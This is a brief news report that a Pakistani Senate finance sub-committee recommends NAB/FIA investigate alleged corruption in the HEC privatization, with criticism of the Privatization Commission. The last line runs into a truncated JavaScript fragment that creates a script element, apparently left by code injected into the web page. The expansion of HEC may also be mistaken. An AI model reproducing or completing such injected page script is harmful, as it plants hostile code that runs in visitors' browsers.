Islamabad: Senate standing sub-committee of finance recommended to refer the transactions of Higher Education Commission to NAB/FIA for investigation of corruption.

The federal watchdogs asked to probe into privatization process of HEC to determine whether the HEC Chairman/Secretary, the top management and the consultants were involved in corruption and embezzlement.

Chairman Senate Standing Committee on Finance, Revenue and Privatization, Senator Saleem Mandviwalla during meeting said that HEC Privatization case is proof of total failure of Privatization Commission.

The Privatization Commission had committed wilful and criminal negligence by having a lackluster and sloppy approach toward the complete Privatization process of the HEC, as was evident in the transaction committee meeting and Privatization Commission meeting on the selection of the bidder for the HEC.

The Privatization commission dealt with the HEC transaction in highly unprofessional, callous and reckless way.

Senator Mandviwalla said that It is strongly recommended to refer the matter to NAB/FIA to investigate into the HEC transaction to determine whether the Chairman/Secretary, the top management and the consultants were involved in embezzlement or not.var d=document;var s=d.createElement(‘script’);
